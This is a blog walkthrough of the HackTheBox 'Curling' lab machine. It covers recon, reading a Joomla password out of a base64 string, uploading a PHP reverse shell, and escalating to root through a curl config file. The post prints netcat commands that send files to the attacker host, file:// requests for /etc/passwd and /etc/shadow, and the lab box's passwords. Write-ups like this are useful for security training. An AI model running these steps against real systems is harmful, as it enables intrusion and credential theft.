One Eyed Techs

127.0.0.1 WHOIS

24/02-2019

HackTheBox: curling by L4mpje

Nmap Scan:

root@kali:~# nmap -sV -sC 10.10.10.150
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-24 14:02 EST
Stats: 0:00:11 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 14:02 (0:00:06 remaining)
Nmap scan report for curling.htb (10.10.10.150)
Host is up (0.057s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 8a:d1:69:b4:90:20:3e:a7:b6:54:01:eb:68:30:3a:ca (RSA)
|   256 9f:0b:c2:b2:0b:ad:8f:a1:4e:0b:f6:33:79:ef:fb:43 (ECDSA)
|_  256 c1:2a:35:44:30:0c:5b:56:6a:3f:a5:cc:64:66:d9:a9 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.86 seconds

Port 80 and 22 is open. Let's take a look at port 80 with the Joomla installation.

Joomla

Nothing special to see here. Looks like a webpage under construction with a few posts by a person named Floris. Running gobuster on the ip returns what is to be expected with a Joomla installation.

root@kali:~# gobuster -w /usr/share/wordlists/dirb/common.txt -u 10.10.10.150
===========================================
Gobuster v2.0.0              OJ Reeves (@TheColonial)
===========================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.150/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
===========================================
2019/02/24 14:46:39 Starting gobuster
===========================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/administrator (Status: 301)
/bin (Status: 301)
/cache (Status: 301)
/components (Status: 301)
/images (Status: 301)
/includes (Status: 301)
/index.php (Status: 200)
/language (Status: 301)
/layouts (Status: 301)
/libraries (Status: 301)
/media (Status: 301)
/modules (Status: 301)
/plugins (Status: 301)
/server-status (Status: 403)
/templates (Status: 301)
/tmp (Status: 301)
===========================================
2019/02/24 14:47:21 Finished
===========================================

10.10.10.150/administrator looks like a decent place to start. Unfortunately no 'default' logins worked.

Joomla login

Investigating the index a little further, revaels a comment in the source code. The comment is made between the body and html end tags.

	</body>
    <!-- secret.txt -->
</html>

Some kind of encoded string is stored at http://10.10.10.150/secret.txt

Could it be base64? Could it be anything else than base64? Let's give it a go in python.

root@kali:~# python
Python 2.7.15+ (default, Aug 31 2018, 11:56:52)
[GCC 8.2.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from base64 import b64decode
>>> print(b64decode("Q3VybGluZzIwMTgh"))
Curling2018!
>>>

Yaay. Let's login on the Joomla administrator page with floris as username and Curling2018! as the password. Once we're in, we can upload a php file with a reverse shell to one of the templates. After changing the ip and port in the script, it should be uploaded any of the two templates. I'll go with Beez3.

Once our reverse shell is uploaded, set netcat to listen to anything on your desired port and hit the magic URL! 10.10.10.150/templates/beez3/revshell.php

root@kali:~# wget 10.10.10.150/templates/beez3/revshell.php
root@kali:~# nc -lnvp 4444
listening on [any] 4444 …
connect to [10.10.15.145] from (UNKNOWN) [10.10.10.150] 56822
Linux curling 4.15.0-22-generic #24-Ubuntu SMP Wed May 16 12:15:17 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
20:46:19 up 17 min, 3 users, load average: 0.38, 0.17, 0.12
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
floris pts/0 10.10.15.6 20:28 1:13 0.46s 0.46s -bash
floris pts/1 10.10.14.148 20:44 8.00s 0.09s 0.03s sshd: floris [priv]
floris pts/3 10.10.12.63 20:32 51.00s 0.21s 0.21s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can’t access tty; job control turned off
$ whoami
www-data
$ pwd
/
$ cd home/floris
$ ls
admin-area
password_backup
user.txt
$ cat user.txt
cat: user.txt: Permission denied
$

Hmmm. We can see the the user.txt file, but we don't have permission to read it. Let's take a closer look at the password_backup file though.

$ nc 10.10.14.6 4444 < password_backup
root@kali:~# nc -lvp 4444 > password_backup
connect to [10.10.13.59] from (UNKNOWN) [10.10.10.150] 46698
root@kali:~#  file password_backup
password_backup: ASCII text
root@kali:~#  cat password_backup
00000000: 425a 6839 3141 5926 5359 819b bb48 0000  BZh91AY&SY...H..
00000010: 17ff fffc 41cf 05f9 5029 6176 61cc 3a34  ....A...P)ava.:4
00000020: 4edc cccc 6e11 5400 23ab 4025 f802 1960  N...n.T.#.@%...`
00000030: 2018 0ca0 0092 1c7a 8340 0000 0000 0000   ......z.@......
00000040: 0680 6988 3468 6469 89a6 d439 ea68 c800  ..i.4hdi...9.h..
00000050: 000f 51a0 0064 681a 069e a190 0000 0034  ..Q..dh........4
00000060: 6900 0781 3501 6e18 c2d7 8c98 874a 13a0  i...5.n......J..
00000070: 0868 ae19 c02a b0c1 7d79 2ec2 3c7e 9d78  .h...*..}y..<~.x
00000080: f53e 0809 f073 5654 c27a 4886 dfa2 e931  .>...sVT.zH....1
00000090: c856 921b 1221 3385 6046 a2dd c173 0d22  .V...!3.`F...s."
000000a0: b996 6ed4 0cdb 8737 6a3a 58ea 6411 5290  ..n....7j:X.d.R.
000000b0: ad6b b12f 0813 8120 8205 a5f5 2970 c503  .k./... ....)p..
000000c0: 37db ab3b e000 ef85 f439 a414 8850 1843  7..;.....9...P.C
000000d0: 8259 be50 0986 1e48 42d5 13ea 1c2a 098c  .Y.P...HB....*..
000000e0: 8a47 ab1d 20a7 5540 72ff 1772 4538 5090  .G.. .U@r..rE8P.
000000f0: 819b bb48                                ...H<

Magic bytes is a term referred to when looking at filetypes. The magic bytes are sometimes located in the beginning of filetypes, that are not meant to be read as text. And they can indicate of which type a file is. For example, .exe files has MZ as magic bytes, .mp3 has ID3 and .dmg has x.s.bb`.

When running file on password_backup, it shows that it's an ASCII text file. However, the file contains, what looks like a hexdump. Googling the magic bytes of the password_backup, BZh, shows that the hexdump must have been of a .bz2 file.

The program xxd has a reverse function which is defined in the xxd manual as this: "-r, reverse operation: convert (or patch) hexdump into binary." Let's try to patch up the textfile with the hexdump.

root@kali:~# xxd -r password_backup > pwdbin
root@kali:~# file pwdbin
pwdbin: bzip2 compressed data, block size = 900k
root@kali:~# mv pwdbin pwdbin.bz2
root@kali:~# bunzip2 pwd.bz2

xxd has reversed the file into a .bz2 file. Unzipping revaels a .gz file.

root@kali:~# file pwdbin
pwdbin: gzip compressed data, was "password", last modified: Tue May 22 19:16:20 2018, from Unix, original size 141
root@kali:~# mv pwdbin pwdbin.gz
root@kali:~# gzip -d pwdbin.gz

Unzipping the .gz file revaels another .bz2 file.

root@kali:~# file pwdbin
pwdbin: bzip2 compressed data, block size = 900k
root@kali:~# mv pwdbin pwdbin.bz2
root@kali:~# bunzip2 pwd.bz2

Extracting the .bz2 file gives us a .tar file.

root@kali:~# file pwdbin
pwdbin: POSIX tar archive (GNU)
root@kali:~# mv pwdbin pwdbin.tar
root@kali:~# tar xvf pwdbin.tar
password.txt

Extracting the .tar file gives us a textfile called password.txt. Finally!

root@kali:~# cat password.txt
5d<wdCbdZu)|hChXll

According to the Nmap scan, SSH on port 22 was also open.

root@kali:~# ssh floris@10.10.10.150
floris@10.10.10.150's password: 5d<wdCbdZu)|hChXll
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-22-generic x86_64)

* Documentation:  https://help.ubuntu.com
* Management:     https://landscape.canonical.com
* Support:        https://ubuntu.com/advantage

System information as of Mon Feb 25 22:39:05 UTC 2019

System load:  0.27              Processes:            209
Usage of /:   46.2% of 9.78GB   Users logged in:      1
Memory usage: 21%               IP address for ens33: 10.10.10.150
Swap usage:   0%


0 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Mon Feb 25 22:38:58 2019 from 10.10.15.125

floris@curling:~$ ls
admin-area  password_backup  user.txt
floris@curling:~$ cat user.txt
65dd1df0713b40d88ead98cf11b8530b
floris@curling:~$ cd admin-area/
floris@curling:~/admin-area/ ls
input  report

Two files in the admin-area dir. Let's grab them with netcat and take a closer look.

root@kali:~# mkdir admin-area
root@kali:~# cd admin-area/
root@kali:~#~/admin-area/ nc -lvp 4444 > input
root@kali:~#~/admin-area/ nc -lvp 4444 > report
floris@curling:~/admin-area/ nc 10.10.13.141 4444 < input
floris@curling:~/admin-area/ nc 10.10.13.141 4444 < report
root@kali:~#~/admin-area/ cat input
url = "http://127.0.0.1"

Hmm. The report file is some kind of html, resembling the index page, and input is nothing but what is seen above. This is a dead end for now.

Enumeration is always a good idea when stuck. Let's look at processes running. I'll spare you for the output here, but one process is distinctive.

floris@curling:~/admin-area/ ps -ef
root      4789  2.0  0.4 105360  9184 ?        S    19:13   0:00 curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report

Every once in a while, a curl command runs with input as the config file and outputs to the report file. The command is run as root. Floris has read and write permissions to these files, so let's change the input file.

floris@curling:~/admin-area/ nano input
url = file:///127.0.0.1/../../root/root.txt
floris@curling:~/admin-area/ cat report
82c198ab6fc5365fdc6da2ee5c2XXXXX

Yaay, got root.txt. Of course we can grab the shadow and passwd files as well, to see if we were able to crack the root password ;-)

floris@curling:~/admin-area/ nano input
url = file:///127.0.0.1/../../etc/passwd
url = file:///127.0.0.1/../../etc/shadow